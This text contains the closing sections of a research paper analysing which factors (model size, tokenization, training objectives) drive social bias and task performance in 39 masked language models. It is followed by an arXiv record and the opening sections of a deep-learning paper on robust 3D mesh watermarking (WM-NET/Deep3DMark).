Quora Question Pairs (QQP; Iyer et al., 2017), Multi-Genre NLI (MNLI; Williams et al., 2018), Question NLI (QNLI; Rajpurkar et al., 2016), Recognizing Textual Entailment (RTE; Dagan et al., 2005; Haim et al., 2006; Giampiccolo et al., 2007; Bentivogli et al., 2009) and Winograd NLI (WNLI; Levesque et al., 2012). These tasks are framed as classification tasks for either single sentences or pairs of sentences. We follow the finetuning procedures from prior work (Devlin et al., 2019; Liu et al., 2019) and report results on the development sets. TweetEvalTweetEval is a unified Twitter benchmark composed of seven heterogeneous tweet classification tasks. The tasks in TweetEval are emoji prediction (Barbieri et al., 2018), emotion recognition (Mohammad et al., 2018), hate speech detection (Basile et al., 2019), irony detection (Van Hee et al., 2018), offensive language identification (Zampieri et al., 2019), sentiment analysis Rosenthal et al. (2017) and stance detection Mohammad et al. (2016). We use the default setting as the TweetEval original baselines to fine-tune pretrained MLMs on the corresponding training set and report average results on the test set after 3 runs. ### Correlation between tasks Table 2 shows the Pearson and Spearman's correlation coefficients between each pair of task performances over the 39 MLMs. We observe a moderate correlation between A-SS and GLUE, which indicates that better performance in GLUE entails a higher stereotypical bias in SS (this is also true for CP but to a much lesser extent). 
In contrast, there is no significant correlation observed between the models' performance on downstream tasks, i.e., TweetEval vs. GLUE. ## 6 Regression Analysis To investigate the importance of the different factors on social bias and the task performance of MLMs, we train a regression model. ### Experimental setting We generate the features for each MLM according to its factors as described in SS3. An example of the features of an individual model is given in Table 3. These features are fed into a regression model as input for training, using both social bias and task performance as output. In order to select the best regression model for this purpose, we compare the performance of 6 different regression models on each prediction task, namely gradient boosting, support vector machine, gaussian process regression, decision tree, random forest and linear regression. We compute the performance of the regression models by means of their coefficient of determination (\(R^{2}\)) and root mean squared error (RMSE) for each prediction task. We use the regression models implemented in sklearn with the default parameters and take the averages over three independent runs. Regression model comparisonThe comparison of different regression models trained using the features from the monolingual MLMs in the general domain is shown in Table 4, while the performance of regression models trained using the features from all of the MLMs is shown in SS A.1. From Table 4, we observe that gradient boosting obtains the best performance in terms of both \(R^{2}\) and RMSE on both A-CP and TweetEval, while the decision tree obtains the best performance on A-SS. Almost all of the regression models return negative \(R^{2}\) scores for GLUE, which proves hard to predict from the analysed factors. An error analysis of each GLUE subtask on gradient boosting in terms of \(R^{2}\) scores is shown in Appendix B. In contrast, the three remaining social-related evaluations, including TweetEval, can be predicted to a reasonable extent. The linear regression model obtains the lowest \(R^{2}\) scores for both A-CP and GLUE, which indicates that a linear model may not be suitable for predicting the performance of MLMs. Given the results, we decided to use gradient boosting for the rest of the experiments in this paper. Feature importanceIn addition, to investigate the influence of the factors on the performance of MLMs using \(R^{2}\) and RMSE, we compute the importance score of each factor after training the regression model using the Gini importance implemented in sklearn. The Gini importance is computed as the normalized total reduction of the criterion brought by that feature. It calculates the global contribution of each feature by aggregating the losses incurred in each split made by that feature Delgado-Panadero et al. (2022). ### Results Feature importanceTable 5 shows the Gini importance scores of each factor. Due to space constraints in this table, we have omitted the factors that received a score of 0 importance (the full table is shown in SSA.2). The parameter size obtains the largest importance score for A-CP, while it is the second most important factor for TweetEval and GLUE. Tokenization is the most important factor for A-SS and the second most for A-CP. \begin{table} \begin{tabular}{l l l} \hline \hline Task pair & Pearson & Spearman \\ \hline A-CP vs. A-SS & 0.607\({}^{\dagger}\) & 0.623\({}^{\dagger}\) \\ A-CP Vs. TweetEval & 0.193 & 0.214 \\ A-CP vs. GLUE & 0.244 & 0.286 \\ A-SS vs. 
TweetEval & 0.338 & 0.304 \\ A-SS vs. GLUE & 0.382\({}^{\dagger}\) & 0.487\({}^{\dagger}\) \\ TweetEval vs. GLUE & 0.229 & 0.309 \\ \hline \hline \end{tabular} \end{table} Table 2: Pearson and Spearman correlations between the models’ performance on pairs of tasks, where \(\dagger\) denotes statistically significant (\(p\)<\(0.05\)) correlations. Factor analysisTo further study the effects of factors on MLMs, we eliminate each of the important factors (i.e., the ones that obtain non-zero importance scores) at a time and track the \(R^{2}\) score returned by the gradient boosting models trained on different tasks. Table 6 shows the result. In this table, the lower \(R^{2}\) score indicates the more important the factor is. Consistent with the result shown in Table 5, sentence order prediction and parameter size are the most and second most important factors for TweetEval, respectively, and parameter size is the most important factor for A-CP. For A-SS, uncased and tokenization are the most and second most important factors, respectively. In addition, we show the corresponding important scores for each factor for training decision tree models in SSA.3 and observe largely similar conclusions to the result presented in Table 5. in SS3. To investigate the effect of a certain group, we conduct ablations by removing a group of factors as well as retaining only one group at a time. Tables 7 and 8 show the corresponding results. The training objectives group of factors is regarded as paramount for social bias evaluation (i.e., A-CP and A-SS) in Table 7, and their removal leads to a substantial decrease in the \(R^{2}\) scores. Meanwhile, Table 8 shows much lower \(R^{2}\) scores across all the cases. This is because of the discrepancy between removing a group of factors and retaining only one category, as the latter entails a reduced utilization of features during the training process. Despite this limitation, we observe that by keeping tokenization only, the regression model can still make relatively accurate predictions for social bias evaluation, indicating that tokenization is important for social bias evaluation. In contrast, training corpora and training objectives are the most important ones on the downstream tasks. ## 7 Qualitative Analysis With the knowledge that model size, tokenization, and training objectives are the three primary categories of factors influencing social bias and task performance in MLMs from SS6.2, we further investigate the factors within each category to discern their individual contributions in MLMs. For this purpose, we calculate the average performance of MLMs when considering a specific feature associated with a factor for each task. To capture the overall trend, we extend our analysis to include not only monolingual MLMs in the general domain but also domain-specific and multilingual MLMs. Table 9 shows the average scores for the top-5 performing MLMs for each category of the important factors. Note that the number of models associated with each category within a specific factor is different. For example, there are 21 MLMs in the _medium_ and 12 in the _large_ categories, whereas there are only 6 in the _small_ category for the parameter size factor. Because some outlier cases are affecting the overall averages, in Table 9 we compute the top-5 performing models in each category, whereas the averages over all models are shown in SSA.4. 
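As a concrete reference for the pipeline in Section 6, a minimal sketch of fitting the gradient boosting model and reading off the Gini importances, assuming a toy feature table (the factor values and target scores below are invented for illustration; the actual study encodes 30 factors for 39 MLMs, predicts each of A-CP, A-SS, TweetEval and GLUE separately, and averages over three runs):

```python
import numpy as np
import pandas as pd
from sklearn.ensemble import GradientBoostingRegressor
from sklearn.metrics import r2_score

# one row per MLM; categorical factors are one-hot encoded, binary factors kept as 0/1
factors = pd.DataFrame({
    "parameter_size": ["S", "M", "L", "M", "L"],                         # S/M/L buckets
    "num_layers":     [6, 12, 24, 12, 24],
    "tokenization":   ["WordPiece", "BPE", "BPE", "SentencePiece", "WordPiece"],
    "distillation":   [1, 0, 0, 0, 0],
})
X = pd.get_dummies(factors)
y = np.array([53.4, 57.8, 59.1, 55.0, 58.6])   # e.g. A-CP bias scores of the five toy MLMs

model = GradientBoostingRegressor().fit(X, y)  # sklearn defaults, as in the experimental setting
print("R^2:", r2_score(y, model.predict(X)))

# Gini importance of each encoded feature, largest first
for name, imp in sorted(zip(X.columns, model.feature_importances_), key=lambda t: -t[1]):
    print(f"{name:30s} {imp:.3f}")
```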
For the model size, we observe that the MLMs trained with a parameter size greater than 100M tend to have better downstream task performance, while reporting higher levels of social biases compared to the ones with a smaller parameter size. The models trained with 6 layers demonstrate the least amount of social biases (i.e., A-CP and A-SS close to 50), however, the ones trained with 24 lay \begin{table} \begin{tabular}{l c c c c} \hline \hline Categories & A-CP & A-SS & TweetEval & GLUE \\ \hline _Without Removing_ & 0.594 & 0.652 & 0.481 & -0.201 \\ Model Size & 0.587 & 0.670 & **0.304** & -0.290 \\ Training Corpora & 0.631 & 0.607 & 0.322 & -0.217 \\ Training Objectives & **-1.010** & **-1.300** & 0.415 & -0.222 \\ Tokenization & 0.563 & 0.100 & 0.428 & **-1.210** \\ Language & 0.589 & 0.646 & 0.450 & -0.173 \\ \hline \hline \end{tabular} \end{table} Table 7: \(R^{2}\) scores removing features from a single category. The most important categories on each task (i.e., those causing a larger \(R^{2}\) drop) are shown in bold. \begin{table} \begin{tabular}{l c c c c} \hline \hline Categories & A-CP & A-SS & TweetEval & GLUE \\ \hline _ALL_ & 0.594 & 0.652 & 0.481 & -0.201 \\ Model Size & 0.096 & -0.420 & 0.191 & -0.780 \\ Training Corpora & -0.044 & 0.028 & **0.340** & -0.225 \\ Training Objectives & -0.180 & 0.319 & -0.944 & **0.008** \\ Tokenization & **0.240** & **0.358** & 0.251 & -0.024 \\ Language & 0.000 & -0.004 & -0.488 & -0.005 \\ \hline \hline \end{tabular} \end{table} Table 8: \(R^{2}\) scores keeping features from one category only. The most important factors on each predicted task are shown in bold. \begin{table} \begin{tabular}{l c c c c} \hline \hline & A-CP & A-SS & TweetEval & GLUE \\ \hline Parameter Size & & & & \\ S (\(x<100M\)) & **54.866** & **57.730** & 59.903 & 78.827 \\ M (\(100M\leqslant x\leqslant 300M\)) & 57.388 & 60.246 & **64.472** & 80.137 \\ L (\(x>300M\)) & 59.072 & 59.838 & 64.040 & **81.449** \\ \hline Number of Layers & & & & \\ 6 layers & **53.383** & **55.097** & 60.116 & 76.288 \\ 12 layers & 57.546 & 60.398 & 64.472 & 81.225 \\ 24 layers & 59.336 & 60.104 & **64.714** & **82.163** \\ \hline Vocabulary Size & & & & \\ S (\(x<50K\)) & 58.196 & 60.674 & 62.101 & **82.413** \\ M (\(50K\leqslant x\leqslant 100K\)) & 58.422 & 60.322 & **65.676** & 81.472 \\ L (\(x>100K\)) & **52.386** & **53.602** & 59.714 & 74.832 \\ \hline Tokenization & & & & \\ BPE & & & & \\ WordPiece & 57.838 & 60.086 & 62.101 & 81.287 \\ SentencePiece & **54.800** & **56.382** & 60.470 & 77.210 \\ \hline Training Objectives & & & & \\ MLM & & & & \\ MLM + NSP & 57.904 & 60.294 & **65.676** & 81.028 \\ MLM + NSP & 56.142 & 58.034 & 61.593 & 80.197 \\ MLM + SOP & 56.995 & 59.185 & 57.314 & **84.926** \\ MLM + MRP & **52.140** & **56.230** & 60.012 & 79.872 \\ WWM + NSP & 59.715 & 60.805 & 62.225 & 80.420 \\ \hline \hline \end{tabular} \end{table} Table 9: Comparison of social bias and task performance of the top 5 performing MLMs on different tasks, according to different features associated with the important factors. MLM, NSP, WWM, SOP and MRP represent masked language modeling, next sentence prediction, whole word masking, sentence ordering prediction and mention reference prediction, respectively. ers obtain better downstream task performance. As for the vocabulary size, the models trained with small- and medium-sized vocabulary obtain the best performance on GLUE and TweetEval, respectively, whereas the ones with a large vocabulary size contain less degree of social biases. 
Regarding the tokenization methods, we see that the models using SentencePiece contain the lowest level of social biases, while the models using BPE obtain better downstream task performance. With respect to training objectives, the models trained with both masked language modelling and mention reference prediction contain the fewest degrees of social biases. On the other hand, models trained with masked language modelling only and models with both masked language modelling and sentence ordering prediction return the best downstream task performance on TweetEval and GLUE, respectively. ## 8 Discussion Model size.Larger MLMs have a higher capability to achieve better performance on downstream tasks, while smaller models are computationally efficient and require fewer hardware resources. From Table 9, we see that models with a larger number of parameters and more layers report better performance in GLUE and TweetEval compared to the smaller and shallower models, while at the same time demonstrating lesser social biases in terms of A-CP and A-SS scores. Because the learning capacity of MLMs increases with the number of parameters and the depth (i.e. number of layers), it is not surprising that larger models outperform the smaller ones on downstream tasks. However, it is interesting to observe that social biases do not necessarily increase with this extra capacity of the MLMs. In the case of gender-related biases, Tal et al. (2022) showed that even if the gender bias scores measured on Winogender Rudinger et al. (2018) are smaller for the larger MLMs, they make more stereotypical errors with respect to gender. However, whether this observation generalises to all types of social biases remains an open question. Mono- vs. Multi-lingual.Table 10 top compares the performance of monolingual vs. multilingual MLMs. We see that multilingual models demonstrate lower levels of social biases compared to their monolingual counterparts. This aligns with prior works that conjecture a multilingual language model to benefit from training over a larger number of languages, thus incorporating a greater spectrum of cultural diversity Liang et al. (2020); Ahn and Oh (2021). Consequently, the presence of these divergent viewpoints within the model can potentially mitigate social biases. Conversely, monolingual models obtain better performance on TweetEval and GLUE, which are limited to English. General vs. Domain-specific.Table 10 bottom shows the performance of models from different domains. Recall from SS4 that we include domain-specific models for social media, legal and biomedical domains. As TweetEval is a social media benchmark, we additionally include the performance of models in the social media domain. Models in the social media domain contain the least bias according to A-CP and achieve the best performance on TweetEval. Conversely, the performance of models in the general domain is better than domain-specific ones on GLUE and obtains the lowest bias score for A-SS. This result is not surprising given the focus on improving tasks of the given domain for domain-specific models, rather than to improve in general tasks. ## 9 Conclusion Despite the extensive prior work evaluating social bias in MLMs, the relationship between social biases and the factors associated with MLMs remains unclear. 
To address this gap, we conducted the first-ever comprehensive study of this type through predictive factor analysis to investigate the impact of different factors on social bias and task performance in pretrained MLMs, considering 39 models with 30 factors. We found that model size, tokenization and training objectives are the three most important factors across tasks. In terms of social biases, domain-specific models do not appear to be more or less biased than general domains, while multilingual models, which are trained on corpora covering different languages and cultures, appear to be less socially biased than the monolingual ones. \begin{table} \begin{tabular}{l c c c c} \hline \hline Models & A-CP & A-SS & TweetEval & GLUE \\ \hline Monolingual & 54.157 & 56.062 & **60.953** & **79.648** \\ Multilingual & **50.342** & **52.092** & 58.187 & 71.723 \\ \hline General Domain & 54.157 & **56.062** & 60.953 & **79.648** \\ Domain-specific & 54.042 & 56.962 & 61.062 & 75.547 \\ Social Media Domain & **53.325** & 57.438 & **64.339** & 75.713 \\ \hline \hline \end{tabular} \end{table} Table 10: The performance of monolingual vs. multilingual models and general domain vs. domain-specific models on social bias and downstream tasks. ### Acknowledgements Jose Camacho-Collados and Yi Zhou are supported by a UKRI future leaders fellowship. Danushka Bollegala holds concurrent appointments as a Professor at University of Liverpool and as an Amazon Scholar. This paper describes work performed at the University of Liverpool and is not associated with Amazon. ### Limitations This paper studies the impact of underlying factors of MLMs on social bias and downstream task performance. In this section, we highlight some of the important limitations of this work. We hope this will be useful when extending our work in the future by addressing these limitations. As described in SS 6, the regression models we take into account in this paper are not able to be properly trained based on the features that we considered. Extending the factors and further exploring the reason for the poor performance of regression models on GLUE is one future direction. We limit our work in this paper to focusing on evaluating intrinsic social bias captured by MLMs. However, there are numerous extrinsic bias evaluation datasets existing such as BiasBios De-Arteaga et al. (2019), STS-bias Webster et al. (2020), NLIbi bias Dev et al. (2020). Extending our work to evaluate the extrinsic biases in MLMs will be a natural line of future work. Furthermore, our analysis focuses on MLMs and not considering generative language models such as GPT-2 Radford et al. (2019), Transformer-XL Dai et al. (2019), XLNet Yang et al. (2019) and GPT-3 Brown et al. (2020). Extending our work to investigate the relationship between models' factors and social bias as well as downstream performance is deferred to future work. Finally, although we tried to collect as many MLMs as possible, the final number may be in some cases insufficient to draw conclusive numerical conclusions in the regression analysis. ### Ethical Considerations In this paper, we aim to investigate which factors affect the social bias captured by MLMs. Although we used existing datasets that are annotated for social biases, we did not annotate nor release new datasets as part of this research. 
In particular, we did not annotate any datasets by ourselves in this work and used multiple corpora and benchmark datasets that have been collected, annotated and repeatedly used for evaluations in prior works. To the best of our knowledge, no ethical issues have been reported concerning these datasets. The gender biases considered in the bias evaluation datasets in this paper cover only binary gender Dev et al. (2021). However, non-binary genders are severely underrepresented in textual data used to train MLMs. Moreover, non-binary genders are often associated with derogatory adjectives. Evaluating social bias by considering non-binary gender is important. Furthermore, biases are not limited to word representations but also appear in sense representations Zhou et al. (2022). However, our analysis did not include any sense embedding models.
2307.11628
Rethinking Mesh Watermark: Towards Highly Robust and Adaptable Deep 3D Mesh Watermarking
The goal of 3D mesh watermarking is to embed the message in 3D meshes that can withstand various attacks imperceptibly and reconstruct the message accurately from watermarked meshes. The watermarking algorithm is supposed to withstand multiple attacks, and the complexity should not grow significantly with the mesh size. Unfortunately, previous methods are less robust against attacks and lack of adaptability. In this paper, we propose a robust and adaptable deep 3D mesh watermarking Deep3DMark that leverages attention-based convolutions in watermarking tasks to embed binary messages in vertex distributions without texture assistance. Furthermore, our Deep3DMark exploits the property that simplified meshes inherit similar relations from the original ones, where the relation is the offset vector directed from one vertex to its neighbor. By doing so, our method can be trained on simplified meshes but remains effective on large size meshes (size adaptable) and unseen categories of meshes (geometry adaptable). Extensive experiments demonstrate our method remains efficient and effective even if the mesh size is 190x increased. Under mesh attacks, Deep3DMark achieves 10%~50% higher accuracy than traditional methods, and 2x higher SNR and 8% higher accuracy than previous DNN-based methods.
Xingyu Zhu, Guanhui Ye, Xiapu Luo, Xuetao Wei
2023-07-21T14:49:30Z
http://arxiv.org/abs/2307.11628v2
# WM-NET: Robust Deep 3D Watermarking with Limited Data ###### Abstract The goal of 3D mesh watermarking is to embed the message in 3D meshes that can withstand various attacks imperceptibly and reconstruct the message accurately from watermarked meshes. Traditional methods are less robust against attacks. Recent DNN-based methods either introduce excessive distortions or fail to embed the watermark without the help of texture information. However, embedding the watermark in textures is insecure because replacing the texture image can completely remove the watermark. In this paper, we propose a robust deep 3D mesh watermarking WM-NET, which leverages attention-based convolutions in watermarking tasks to embed binary messages in vertex distributions without texture assistance. Furthermore, our WM-NET exploits the property that simplified meshes inherit similar relations from the original ones, where the relation is the offset vector directed from one vertex to its neighbor. By doing so, our method can be trained on simplified meshes(limited data) but remains effective on large-sized meshes (size adaptable) and unseen categories of meshes (geometry adaptable). Extensive experiments demonstrate our method brings 50% fewer distortions and 10% higher bit accuracy compared to previous work. Our watermark WM-NET is robust against various mesh attacks, e.g. Gauss, rotation, translation, scaling, and cropping. ## 1 Introduction Digital watermarking is a technology used in copyright protection of multimedia, such as images, videos, point clouds, and meshes. The goal of digital watermarking is to obtain watermarked media by embedding messages in the media in the embedding phase and reconstructing the message from the watermarked media in the reconstruction phase. The watermark should be _imperceptible_ and _robust_ so that it can withstand attacks and be _efficient_ for fast and size-agnostic copyright protection. Previous 3D mesh watermarking methods can be classified into DNN-based and non-DNN-based methods. Non-DNN-based methods embedded messages in either spectral domain [28, 27, 26, 44, 40, 1] or spatial domain [55, 17]. The complexity of frequency domain-based methods grows cubically with the mesh size because they rely on matrix eigenvalue decomposition. Spatial domain methods such as least-bit encoding are less robust to mesh attacks such as Gaussian attacks. Recent DNN-based methods showed the possibility of embedding messages in vertex distributions [47] and texture distributions [54]. However, [54] can Figure 1: **Top**: we train our WM–NET on simplified meshes to simulate limited data scenarios. **Bottom**: WM–NET shows adaptation on varied mesh sizes and unseen geometry. Figure 2: Comparison between ours and previous. only verify the watermark with the help of texture. The attacker can easily remove the watermark by replacing the texture image. Although [47] embedded messages in vertex distributions and reduced artifacts caused by watermarking with the introduction of an additional curvature penalty during training, their watermarked meshes were still perceptually different from the original ones. Moreover, watermark quality and embedding overhead should be less impacted by variations in mesh sizes and geometries. Overall, no previous work explored a robust and adaptive watermarking method under multiple variations. 
In this paper, we propose a robust deep 3D watermarking WM-NET, a generative adversarial network (GAN) based watermarking architecture that can invisibly embed binary messages in vertex distributions and later reconstruct messages from watermarked meshes. Furthermore, our method is adaptable to different sizes of meshes and can be extended to unseen geometries. We explore watermarking in vertex distributions of meshes in an _imperceptible_, _robust_, and _adaptable_ way. There are two challenges in the following. **The first challenge** is how to conceal a binary message in vertex distributions without causing visible distortions. **The second challenge** is how to ensure that the watermarking method is adaptable to unseen geometries and remains efficient and effective even with an increased mesh size. We tackle these challenges based on two insights. The first insight is that convolutions on images and meshes are similar. Thus the success of image watermarking [57] can be transferred to mesh watermarking by using graph-attention network (GAT) [46]. The second insight is that different sizes of meshes under the same categories share similar features. By exploiting such similarities, we can train our WM-NET with simplified meshes(limited data) and keep effective on meshes with increased sizes. Our extensive experiments demonstrate that attention-based convolution can be also generalized to unseen geometries. Specifically, our adopted GAT is the backbone of our WM-NET, which can generate watermarked meshes given the original meshes and binary messages, and reconstruct the binary messages from the watermarked meshes. Our WM-NET consists of 1) an encoder, 2) a decoder, 3) a message autoencoder, 4) an attack layer, and 5) a discriminator, as shown in Fig. 5. We train our WM-NET using limited data from the train set under all scenarios to better evaluate the adaptation. To prove effectiveness, our WM-NET is tested on full test data. To prove both geometry and size adaptation, we test WM-NET on various datasets and different sizes of meshes. We also measure its capacity by inserting various lengths of binary messages. In summary, our key contributions are the following: * We propose a robust deep 3D watermarking WM-NET, a generative adversarial network (GAN) based watermarking architecture, which embeds binary messages in vertex distributions without the texture assistance by incorporating the graph attention network (GAT). * We exploit the property that simplified meshes inherit similar relations from the original meshes, where the relation is an offset vector directed from a vertex to its neighbor. Our WM-NET can be trained on simplified meshes(limited data) but remains effective on large-sized meshes (size adaptable) and unseen categories of meshes (geometry adaptable). * We conduct extensive experiments on various datasets to prove WM-NET's effectiveness and adaptation. Our WM-NET has 50% fewer distortions and 10% higher bit accuracy than previous methods which embed in vertex distributions and achieves similar distortions and accuracy with texture-based methods. We highlight that watermarking in vertex distributions is more secure and harder than watermarking in texture. ## 2 Related Work ### Watermarking The application of deep neural networks (DNNs) over 3D mesh watermarking tasks is far from exploration. 
Early 3D mesh watermarking methods [28, 27, 26, 44, 40, 1] used Fourier and wavelet analysis to transfer meshes into the frequency domain and embed watermark bits into Fourier/wavelet coefficients, but the time complexity of these methods grows cubically with the number of vertices. [55, 17] proposed to embed watermarks into the least significant bits of vertex coordinates to minimize the distortion. [15] leveraged the layering artifacts of 3D-printed meshes for watermark embedding and reconstruction. Recently, [54] and [47] explored the feasibility of DNNs for watermarking. [47] stacked graph residual blocks to embed and extract the watermark. [54] embedded secret messages in textures of meshes and then extracted the message from the rendered 2D image, but cannot reconstruct an accurate message without the help of a texture encoder. Recently, [7] researched how to detect DNN-generated images. \begin{table} \begin{tabular}{c|c|c|c|c|c} Approach & Message Reconstruction & Imperceptibility & Robustness & Size Adaptation & Geometry Adaptation \\ \hline Yoo _et al._ [54] & ✔ & ✔ & ✔ & ✘ & ✘ \\ Wang _et al._ [47] & ✔ & ✘ & ✔ & ✘ & ✘ \\ WM-NET (ours) & ✔ & ✔ & ✔ & ✔ & ✔ \\ \hline \hline \end{tabular} \end{table} Table 1: Overview of the advantages. ✔ indicates satisfying the corresponding feature and ✘ indicates not. ### Neural Networks for 3D Meshes Existing methods for 3D data built features from faces [52, 9, 21, 13, 16, 19], edges [39, 46, 49], and vertices [29, 30, 50, 24, 53, 12, 11]. The built features were applied to downstream tasks such as classification and segmentation. [46, 39] introduced an attention-based mechanism into graph convolution, where the weight of each neighbor is adjusted based on the edge information. Such graph-based convolution can be further extended to 3D meshes. A series of mesh autoencoders [41, 56, 36] was proposed for mesh reconstruction and mesh denoising. ### Domain Adaptation Although extensive work has been proposed to perform unsupervised domain adaptation (UDA) on images and point clouds, UDA on autoencoders of 3D meshes was rarely explored. In 2D images, [10, 18, 25, 33, 34, 43] aimed to reduce the difference between two domain distributions in the feature space, and [2, 14, 38] learned the translation from the source domain to the target domain. In 3D point clouds, [31] addressed the domain shift problem for shape classification, [37] provided adaptability by learning geometry-aware implicit functions, [20] proposed data augmentation to improve the generalization of 3D mesh detectors, and [48] noticed that the domain variance was caused by vehicle sizes and bridged the gaps between domains. ## 3 Definition Triangle meshes can be viewed as undirected graphs \(G(V,E)\). The vertex set \(V\in\mathbb{R}^{N_{v}\times C_{v}}\) contains \(N_{v}\) vertices, and each vertex has \(C_{v}\) vertex elements such as coordinates and normals. The edge set \(E\) can be derived from the face set of a triangle mesh, where each face is a triangle formed by three vertex indices. Since changes to \(E\) produce unexpected artifacts, we embed a binary message \(M\in\{0,1\}^{N_{m}}\) into the vertex distribution \(V\). Let \(V,\hat{V},M,\hat{M}\) denote the original vertices, watermarked vertices, binary message, and reconstructed message, respectively. 
We model the problem by the following equations: \[\begin{split}\hat{V}&=\mathcal{E}_{\phi}(V,M)\\ \hat{M}&=\mathcal{D}_{\theta}(\hat{V})\end{split} \tag{1}\] In Eq 1, a parameterized encoding function \(\mathcal{E}_{\phi}\) generates watermarked vertices \(\hat{V}\) given original vertices \(V\) and a binary message \(M\). A parameterized decoding function \(\mathcal{D}_{\theta}\) reconstructs \(\hat{M}\) from \(\hat{V}\). The encoding function should minimize the perturbation between \(V\) and \(\hat{V}\) by minimizing the following loss to achieve imperceptible embedding: \[L_{enc}(\phi,\theta)=\mathbb{E}_{V,M}[\|\hat{V}-V\|_{2}^{2}] \tag{2}\] To achieve precise reconstruction, we try to minimize the following loss: \[L_{dec}(\phi,\theta)=\mathbb{E}_{V,M}[\|\hat{M}-M\|_{2}^{2}] \tag{3}\] Finally, we have combined the optimization problem: \[\phi^{*},\theta^{*}=\operatorname*{arg\,min}_{\phi,\theta}(L_{enc}(\phi, \theta)+L_{dec}(\phi,\theta)) \tag{4}\] ## 4 Method We propose WM-NET, an end-to-end generation network for imperceptible watermarking that can be robust to arbitrary attacks and be adaptive with different mesh sizes and geometry. To watermark a graph signal \(G(V,E)\), we naturally consider spectral-based graph convolution [6] to perform watermarking tasks. However, spectral-based methods focus on the global feature because they rely on the Laplacian decomposition on the entire graph, which makes them less robust to cropping attacks and less efficient to large graphs. We utilize local features in the spatial domain using graph attention network (GAT) in Section 4.1, which is the backbone of our WM-NET. Section 4.2 introduces all WM-NET modules, followed by a detailed introduction to our training details. ### Graph Attention Network on Mesh Graph attention network (GAT) is a convolution operator defined on graphs. For \(l\)-th layer of GAT, the input is a set of vertex features \(\mathbf{F}^{l}=\{F_{v_{0}}^{l},F_{v_{2}}^{l},...,F_{v_{N}}^{l}\}\), where \(N\) is the number of vertices. This layer produces a new set of vertex features \(\mathbf{F}^{l+1}=\{F_{v_{0}}^{l+1},F_{v_{2}}^{l+1},...,F_{v_{N}}^{l+1}\}\). For each vertex \(v_{i}\), its new feature \(F_{v_{i}}^{l+1}\) is computed as the averaged weighted sum of its neighbor features \(F_{v_{j}}^{l}\) for all \(v_{j}\in\mathcal{N}(v_{i})\). To increase expressive power, weights for each neighbor \(v_{j}\) are obtained from learnable linear transform \(W_{\Theta}\). In Section 3, we view 3D meshes as graphs \(G(V,E)\). We first define our GAT on meshes as: \[F_{v_{i}}^{l+1}=\frac{1}{|\mathcal{N}(v_{i})|}\sum_{v_{j}\in\mathcal{N}(v_{i} )}F_{v_{j}}^{l}W_{\Theta}(D(v_{j},v_{i})) \tag{5}\] where \(F^{l+1}(v_{i})\) is the feature vector of \(v_{i}\) at \((l+1)\)-th layer. The neighborhood \(\mathcal{N}(v_{i})=\{v_{j},(v_{j},v_{i})\in E\}\cup\{v_{i}\}\) is defined as all points adjacent to the point \(v_{i}\) and itself. We use a multilayer perceptron (MLP) to model the learnable linear transform \(W_{\Theta}\). The input of the MLP is the relation \(D(v_{i},v_{j})\) between the target vertex \(v_{i}\) and its neighbor \(v_{j}\). Figure 3 gives a visualization process of our GAT. We show that it is beneficial to learn from relation \(D(v_{i},v_{j})\). We define relation \(D(v_{i},v_{j})=\vec{v_{i}}-\vec{v_{j}}\) as the coordinate offset from \(v_{i}\) to \(v_{j}\). Such the relation can survive the mesh simplification algorithm [22, 23]. First, we simplify meshes to reduce the vertex number to \(1/5\) of the original, _i.e_. 
\(N_{v}^{\prime}=1/5N_{v}\). Then we visualize the coordinates and relation distributions for both original and simplified meshes in Figure 4. Figure 4 shows coordinate distribution differences between original and simplified meshes, while relation distributions are still included in the original distributions. Based on this insight, our method is trained on simplified meshes and show adaptation to increased-size meshes. ### Wm-Net Our WM-NET is a GAN-based network (Figure 5) to achieve objectives in Eq.(4). Our architecture consists of five parameterized learnable components: 1) a message autoencoder that can map a binary message \(M\) to a latent code \(z\) and decode \(z\) back to \(M\), 2) an encoder \(\mathbf{E}\) models function \(\mathcal{E}_{\phi}\) that generates a watermarked vertices \(\hat{V}\) given \(V\) and \(z\), 3) an attack layer applies perturbation over \(\hat{V}\) to increase the robustness in the way of data augmentation, 4) a decoder \(\mathbf{D}\) models \(\mathcal{D}_{\theta}\) that reconstructs binary message from \(\hat{v}\), and 5) a discriminator \(\mathbf{A}\) encourages \(\hat{V}\) indistinguishable from \(V\). The **encoder**\(\mathbf{E}\) first applies convolutions to input \(V\) to form some intermediate representation. We aim to incorporate message latent code \(z\) in the way that the encoder learns to embed parts of it at any spatial location of \(V\). To achieve this, we replicate the latent code and concatenate it to the intermediate representations. We apply more convolutions to transform the concatenated feature to watermarked vertices \(\hat{V}\). The **attack layer** applies perturbations to generated \(\hat{V}\). The perturbations consider several mesh attacks, including 1) cropping attack with cropping ratio \(c\), 2) Gaussian noise with mean \(\mu\) and deviation \(\sigma\), 3) random rotation attacks with rotate center \((x,y,z)\) and degree \(\alpha\), 4) translation attack and 5) scaling attack with a scaling ratio \(s\). Our ablation study shows that the attack layer effectively increases the robustness against multiple attacks. The **decoder**\(\mathbf{D}\) first applies several convolutions to generate the intermediate representation of \(\hat{V}\). It finally uses a global average pooling followed by an MLP layer to generate a vector of the same size as the latent code \(z\). The global average pooling layer ensures that our method aggregates information from all vertices. The **adversarial discriminator \(\mathbf{A}\)** shares a similar structure as the decoder except that its final MLP layer transforms the aggregated vector into a binary classification, which indicates whether the given \(\hat{V}\) is generated by the encoder \(\mathbf{E}\). According to Shannon's capacity theory [35], redundancy is necessary to achieve robustness. The **message autoencoder** increases the robustness of our system by injecting redundancy into the system. Given a binary message \(M\) of length \(N_{m}\), the message encoder maps it into a latent code \(z\) of length \(N_{z}>N_{m}\), which can be used to recover Figure 4: t-SNE [45] visualization of the distribution between original and simplified meshes. (a) shows the existence of distribution shifts between the original and decimated coordinates. However, (b) shows that the distributions of decimated relations \(D(v_{i},v_{j})\) are included in the distributions of the original ones. \(M\) through a message decoder. 
